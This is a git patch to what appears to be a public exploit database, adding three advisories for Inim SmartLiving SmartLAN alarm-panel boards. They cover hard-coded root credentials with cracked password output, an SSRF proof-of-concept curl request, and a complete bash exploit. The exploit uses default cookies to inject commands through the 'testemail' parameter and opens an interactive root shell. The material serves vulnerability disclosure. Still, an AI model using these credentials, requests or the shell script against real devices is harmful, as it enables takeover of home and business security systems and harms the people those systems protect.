From 09d5da74fb60ba78fdc956336456eb7be8b453e0 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 11 Dec 2019 05:01:56 +0000 Subject: [PATCH] DB: 2019-12-11 3 changes to exploits/shellcodes Inim Electronics Smartliving SmartLAN 6.x - Hard-coded Credentials Inim Electronics Smartliving SmartLAN 6.x - Unauthenticated Server-Side Request Forgery Inim Electronics Smartliving SmartLAN 6.x - Remote Command Execution --- exploits/hardware/local/47763.txt | 79 ++++++++++++ exploits/hardware/webapps/47764.txt | 72 +++++++++++ exploits/hardware/webapps/47765.txt | 192 ++++++++++++++++++++++++++++ files_exploits.csv | 3 + 4 files changed, 346 insertions(+) create mode 100644 exploits/hardware/local/47763.txt create mode 100644 exploits/hardware/webapps/47764.txt create mode 100644 exploits/hardware/webapps/47765.txt diff --git a/exploits/hardware/local/47763.txt b/exploits/hardware/local/47763.txt new file mode 100644 index 000000000..0b5ae452a --- /dev/null +++ b/exploits/hardware/local/47763.txt @@ -0,0 +1,79 @@ +# Exploit Title: Inim Electronics Smartliving SmartLAN 6.x - Hard-coded Credentials +# Exploit Author: LiquidWorm +# Date: 2019-12-09 +# Product web page: https://www.inim.biz +# Link: https://www.inim.biz/en/antintrusion-control-panels/home-automation/control-panel-smartliving? +# Advisory ID: ZSL-2019-5546 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5546.php + +Inim Electronics Smartliving SmartLAN/G/SI <=6.x Hard-coded Credentials + + +Vendor: INIM Electronics s.r.l. +Product web page: https://www.inim.biz +Link: https://www.inim.biz/en/antintrusion-control-panels/home-automation/control-panel-smartliving? +Affected version: <=6.x +Affected models: SmartLiving 505 + SmartLiving 515 + SmartLiving 1050, SmartLiving 1050/G3 + SmartLiving 10100L, SmartLiving10100L/G3 + +Summary: SmartLiving anti-intrusion control panel and security system provides +important features rarely found in residential, commercial or industrial application +systems of its kind. This optimized-performance control panel provides first-rate +features such as: graphic display, text-to-speech, voice notifier, flexible hardware, +end-to-end voice transmission (voice-on-bus), IP connectivity. + +SMARTLAN/SI: +The system-on-chip platform used in the SmartLAN/SI accessory board provides point-to-point +networking capability and fast connectivity to the Internet. Therefore, it is possible +to set up a remote connection and program or control the system via the SmartLeague +software application. In effect, the SmartLAN/SI board grants the same level of access +to the system as a local RS232 connection. + +SMARTLAN/G: +The SmartLAN/G board operates in the same way as the SmartLAN/SI but in addition provides +advanced remote-access and communication functions. The SmartLAN/G board is capable of +sending event-related e-mails automatically. Each e-mail can be associated with a subject, +an attachment and a text message. The attachment can be of any kind and is saved to an +SD card. The message text can contain direct links to domains or IP addressable devices, +such as a security cameras. In addition to e-mails, the SmartLAN/G board offers users +global access to their control panels via any Internet browser accessed through a PC, +PDA or Smartphone. In fact, the SmartLAN/G has an integrated web-server capable of +distinguishing the means of connection and as a result provides an appropriate web-page +for the tool in use. Smartphones can control the system in much the same way as a +household keypad, from inside the house or from any part of the world. + +Desc: The devices utilizes hard-coded credentials within its Linux distribution image. +These sets of credentials (Telnet, SSH, FTP) are never exposed to the end-user and cannot +be changed through any normal operation of the smart home device. Attacker could exploit +this vulnerability by logging in and gain system access. + +Tested on: GNU/Linux 3.2.1 armv5tejl + Boa/0.94.14rc21 + BusyBox v1.20.2 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2019-5546 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5546.php + + +06.09.2019 + +-- + + +# cat /etc/passwd +root:$1$$uqbusDeGY2YWqg.T2S1100:0:0:administrator:/:/bin/sh +nobody:*:254:254:nobody:/var/empty:/bin/sh +logout:gfr8cijmRSDck:498:506:logout:/: + +# john --show /etc/passwd +root:pass:0:0:administrator:/:/bin/sh +logout:logout:498:506:logout:/: + +2 password hashes cracked, 0 left \ No newline at end of file diff --git a/exploits/hardware/webapps/47764.txt b/exploits/hardware/webapps/47764.txt new file mode 100644 index 000000000..6185243b3 --- /dev/null +++ b/exploits/hardware/webapps/47764.txt @@ -0,0 +1,72 @@ +# Exploit Title: Inim Electronics Smartliving SmartLAN 6.x - Unauthenticated Server-Side Request Forgery +# Author: LiquidWorm +# Date: 2019-12-09 +# Product web page: https://www.inim.biz +# Link: https://www.inim.biz/en/antintrusion-control-panels/home-automation/control-panel-smartliving? +# Version: 6.x +# Advisory ID: ZSL-2019-5545 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5545.php + +Inim Electronics Smartliving SmartLAN/G/SI <=6.x Unauthenticated SSRF + + +Vendor: INIM Electronics s.r.l. +Product web page: https://www.inim.biz +Link: https://www.inim.biz/en/antintrusion-control-panels/home-automation/control-panel-smartliving? +Affected version: <=6.x +Affected models: SmartLiving 505 + SmartLiving 515 + SmartLiving 1050, SmartLiving 1050/G3 + SmartLiving 10100L, SmartLiving10100L/G3 + +Summary: SmartLiving anti-intrusion control panel and security system provides +important features rarely found in residential, commercial or industrial application +systems of its kind. This optimized-performance control panel provides first-rate +features such as: graphic display, text-to-speech, voice notifier, flexible hardware, +end-to-end voice transmission (voice-on-bus), IP connectivity. + +SMARTLAN/SI: +The system-on-chip platform used in the SmartLAN/SI accessory board provides point-to-point +networking capability and fast connectivity to the Internet. Therefore, it is possible +to set up a remote connection and program or control the system via the SmartLeague +software application. In effect, the SmartLAN/SI board grants the same level of access +to the system as a local RS232 connection. + +SMARTLAN/G: +The SmartLAN/G board operates in the same way as the SmartLAN/SI but in addition provides +advanced remote-access and communication functions. The SmartLAN/G board is capable of +sending event-related e-mails automatically. Each e-mail can be associated with a subject, +an attachment and a text message. The attachment can be of any kind and is saved to an +SD card. The message text can contain direct links to domains or IP addressable devices, +such as a security cameras. In addition to e-mails, the SmartLAN/G board offers users +global access to their control panels via any Internet browser accessed through a PC, +PDA or Smartphone. In fact, the SmartLAN/G has an integrated web-server capable of +distinguishing the means of connection and as a result provides an appropriate web-page +for the tool in use. Smartphones can control the system in much the same way as a +household keypad, from inside the house or from any part of the world. + +Desc: Unauthenticated Server-Side Request Forgery (SSRF) vulnerability exists in the +SmartLiving SmartLAN within the GetImage functionality. The application parses user +supplied data in the GET parameter 'host' to construct an image request to the service +through onvif.cgi. Since no validation is carried out on the parameter, an attacker +can specify an external domain and force the application to make an HTTP request to +an arbitrary destination host. This can be used by an external attacker for example +to bypass firewalls and initiate a service and network enumeration on the internal +network through the affected application. + +Tested on: GNU/Linux 3.2.1 armv5tejl + Boa/0.94.14rc21 + BusyBox v1.20.2 + + +Vulnerability discovered by Sipke Mellema + @zeroscience + + +Advisory ID: ZSL-2019-5545 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5545.php + + +PoC: + +curl http://192.168.1.17/cgi-bin/onvif.cgi -X POST -d"mod=GetImage&host=http://127.0.0.1:23&par=2" \ No newline at end of file diff --git a/exploits/hardware/webapps/47765.txt b/exploits/hardware/webapps/47765.txt new file mode 100644 index 000000000..98b8401f4 --- /dev/null +++ b/exploits/hardware/webapps/47765.txt @@ -0,0 +1,192 @@ +# Exploit Title: Inim Electronics Smartliving SmartLAN 6.x - Remote Command Execution +# Author: LiquidWorm +# Date: 2019-12-09 +# Product web page: https://www.inim.biz +# Link: https://www.inim.biz/en/antintrusion-control-panels/home-automation/control-panel-smartliving? +# Version: 6.x +# Advisory ID: ZSL-2019-5545 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5545.php + +#!/bin/bash +# +# +# Inim Electronics SmartLiving SmartLAN/G/SI <=6.x Root Remote Command Execution +# +# +# Vendor: INIM Electronics s.r.l. +# Product web page: https://www.inim.biz +# Link: https://www.inim.biz/en/antintrusion-control-panels/home-automation/control-panel-smartliving? +# Affected version: <=6.x +# Affected models: SmartLiving 505 +# SmartLiving 515 +# SmartLiving 1050, SmartLiving 1050/G3 +# SmartLiving 10100L, SmartLiving10100L/G3 +# +# Summary: SmartLiving anti-intrusion control panel and security system provides +# important features rarely found in residential, commercial or industrial application +# systems of its kind. This optimized-performance control panel provides first-rate +# features such as: graphic display, text-to-speech, voice notifier, flexible hardware, +# end-to-end voice transmission (voice-on-bus), IP connectivity. +# +# SMARTLAN/SI: +# The system-on-chip platform used in the SmartLAN/SI accessory board provides point-to-point +# networking capability and fast connectivity to the Internet. Therefore, it is possible +# to set up a remote connection and program or control the system via the SmartLeague +# software application. In effect, the SmartLAN/SI board grants the same level of access +# to the system as a local RS232 connection. +# +# SMARTLAN/G: +# The SmartLAN/G board operates in the same way as the SmartLAN/SI but in addition provides +# advanced remote-access and communication functions. The SmartLAN/G board is capable of +# sending event-related e-mails automatically. Each e-mail can be associated with a subject, +# an attachment and a text message. The attachment can be of any kind and is saved to an +# SD card. The message text can contain direct links to domains or IP addressable devices, +# such as a security cameras. In addition to e-mails, the SmartLAN/G board offers users +# global access to their control panels via any Internet browser accessed through a PC, +# PDA or Smartphone. In fact, the SmartLAN/G has an integrated web-server capable of +# distinguishing the means of connection and as a result provides an appropriate web-page +# for the tool in use. Smartphones can control the system in much the same way as a +# household keypad, from inside the house or from any part of the world. +# +# Desc: SmartLiving SmartLAN suffers from an authenticated remote command injection vulnerability. +# The issue exist due to the 'par' POST parameter not being sanitized when called with +# the 'testemail' module through web.cgi binary. The vulnerable CGI binary (ELF 32-bit +# LSB executable, ARM) is calling the 'sh' executable via the system() function to issue +# a command using the mailx service and its vulnerable string format parameter allowing +# for OS command injection with root privileges. An attacker can remotely execute system +# commands as the root user using default credentials and bypass access controls in place. +# +# ================= dissassembly of vuln function ================= +# +#[0x0000c86c]> pd @ 0x000c86c +#| ;-- pc: +#| ;-- r15: +#| 0x0000c86c ldr r1, str.testemail ; [0xed96:4]=0x74736574 ; "testemail" ; const char * s2 +#| 0x0000c870 bl sym.imp.strcmp ; int strcmp(const char *s1, const char *s2) +#| 0x0000c874 cmp r0, 0 +#| 0x0000c878 bne 0xc8b8 +#| 0x0000c87c cmp sl, 0 +#| 0x0000c880 beq 0xd148 +#| 0x0000c884 bl sym.set_no_cache +#| 0x0000c888 add r5, sp, 0x20 +#| 0x0000c88c mov r0, r4 +#| 0x0000c890 ldr r1, str.application_json ; [0xeda0:4]=0x6c707061 ; "application/json" +#| 0x0000c894 bl sym.imp.qcgires_setcontenttype +#| 0x0000c898 mov r0, r5 ; char *s +#| 0x0000c89c mov r1, 0xc8 ; 200 ; size_t +#| 0x0000c8a0 ldr r2, str.echo__Hello_____mailx__s__Email_test___s ; [0xedb1:4]=0x6f686365 ; "echo \"Hello!\" | mailx -s \"Email test\" %s" ; con +#| 0x0000c8a4 mov r3, r8 ; ... +#| 0x0000c8a8 bl sym.imp.snprintf ; int snprintf(char *s, +#| 0x0000c8ac mov r0, r5 ; const char * string +#| 0x0000c8b0 bl sym.imp.system ; int system(const char *string) +#| 0x0000c8b4 b 0xd134 +#| +#| system() @0x0000c8b0 arguments: "sh -c echo "Hello!" | mailx -s "Email test" %s" +#| Trigger suggest: $(curl -sik http://192.168.1.17/cgi-bin/web.cgi -X POST --data "mod=testemail&par=;/sbin/ifconfig" --cookie "user=admin;pass=pass;code=9999") +#| Process: 1351 root 0:00 sh -c echo "Hello!" | mailx -s "Emaiil test" ;/sbin/ifconfig +#|__ +# ================================================================= +# +# ----------------------------------------------------------------- +# +# root@kali:~# ./xpl.sh https://192.168.1.17 +# +# Checking target: https://192.168.1.17 +# ACCESS GRANTED! +# +# root@ssl> id; uname -a; getconf LONG_BIT; cat ../version.html; pwd +# uid=0(root) gid=0(root) groups=0(root),10(wheel) +# Linux SmartLAN 3.2.1 #195 PREEMPT Thu May 30 15:26:27 CEST 2013 armv5tejl GNU/Linux +# 32 +# +#

+# SmartLiving 6.07 10100 +#

SmartLAN/G v. 6.11 +# /www/cgi-bin +# root@ssl> exit +# root@kali:~/# +# +# ----------------------------------------------------------------- +# +# Tested on: GNU/Linux 3.2.1 armv5tejl +# Boa/0.94.14rc21 +# BusyBox v1.20.2 +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# @zeroscience +# +# +# Advisory ID: ZSL-2019-5544 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5544.php +# +# +# 06.09.2019 +# + +URL=$1 +CGI="/cgi-bin/web.cgi" +COOK="user=admin;pass=pass;code=9999" +COOK1="user=admin;pass=pass;code=9998" +COOK2="user=user;pass=pass;code=0001" +PARAMS="mod=testemail&par=;" +CHECK=${URL:4:1} + +if [ "$#" -ne 1 ]; then + echo -en "\e[34m" + echo "===============================================" + echo " SmartLiving SmartLAN 6.x Remote Root Exploit" + echo -e "\t\tZSL-2019-5544" + echo "===============================================" + echo -en "\e[00m" + echo -e "\nUsage: $0 http(s)://ip:port\n" + exit 0 +fi + +echo -ne "\nChecking target: $URL\n" + +if [ "$CHECK" == "s" ]; then + TEST=$(curl -sIk $URL 2>/dev/null | head -1 | awk -F" " '{print $2}') + if [[ "$?" = "7" ]] || [[ $TEST != "200" ]]; then + echo "HTTPS with error!" + exit 0 + fi + if curl -sik -X POST "$URL$CGI" -H "Cookie: $COOK" -d"${PARAMS}id" | grep uid 1>/dev/null + then + echo -e "ACCESS GRANTED!\n" + else + echo "Invalid credentials." + exit 0 + fi + while true; do + R="$(tput sgr0)" + S="$(tput setaf 2)" + read -rp "${S}root@ssl>${R} " CMD + if [[ "$CMD" == "exit" ]]; then + exit 0 + fi + curl -sik -X POST "$URL$CGI" -H "Cookie: $COOK" -d"$PARAMS${CMD}" | awk "/Connection: close/{j=1;next}j" | head -n -5 + done +else + TEST=$(curl -sI $URL 2>/dev/null | head -1 | awk -F" " '{print $2}') + if [[ "$?" = "7" ]] || [[ $TEST != "200" ]]; then + echo "HTTP with error!" + exit 0 + fi + if curl -si -X POST "$URL$CGI" -H "Cookie: $COOK" -d"${PARAMS}id" | grep uid 1>/dev/null + then + echo -e "ACCESS GRANTED!\n" + else + echo "Invalid credentials." + exit 0 + fi + while true; do + R="$(tput sgr0)" + S="$(tput setaf 2)" + read -rp "${S}root@http>${R} " CMD + if [[ "$CMD" == "exit" ]]; then + exit 0 + fi + curl -si -X POST "$URL$CGI" -H "Cookie: $COOK" -d"$PARAMS${CMD}" | awk "/Connection: close/{j=1;next}j" | head -n -5 + done +fi \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index ff09127ae..6b6e82a1f 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10834,6 +10834,7 @@ id,file,description,date,author,type,platform,port 47754,exploits/windows/local/47754.py,"Microsoft Windows - 'WSReset' UAC Protection Bypass (Registry)",2019-09-02,valen,local,windows, 47755,exploits/windows/local/47755.c,"Microsoft Windows 10 - 'WSReset' UAC Protection Bypass (propsys.dll)",2019-09-20,valen,local,windows, 47759,exploits/windows/local/47759.py,"SpotAuditor 5.3.2 - 'Base64' Local Buffer Overflow (SEH)",2019-12-09,"Kirill Nikolaev",local,windows, +47763,exploits/hardware/local/47763.txt,"Inim Electronics Smartliving SmartLAN 6.x - Hard-coded Credentials",2019-12-10,LiquidWorm,local,hardware, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -42072,3 +42073,5 @@ id,file,description,date,author,type,platform,port 47760,exploits/hardware/webapps/47760.py,"Yachtcontrol Webapplication 1.0 - Unauthenticated Remote Code Execution",2019-12-09,Hodorsec,webapps,hardware, 47761,exploits/php/webapps/47761.py,"Alcatel-Lucent Omnivista 8770 - Remote Code Execution",2019-12-09,0x1911,webapps,php, 47762,exploits/java/webapps/47762.txt,"Oracle Siebel Sales 8.1 - Persistent Cross-Site Scripting",2019-12-09,omurugur,webapps,java, +47764,exploits/hardware/webapps/47764.txt,"Inim Electronics Smartliving SmartLAN 6.x - Unauthenticated Server-Side Request Forgery",2019-12-10,LiquidWorm,webapps,hardware, +47765,exploits/hardware/webapps/47765.txt,"Inim Electronics Smartliving SmartLAN 6.x - Remote Command Execution",2019-12-10,LiquidWorm,webapps,hardware,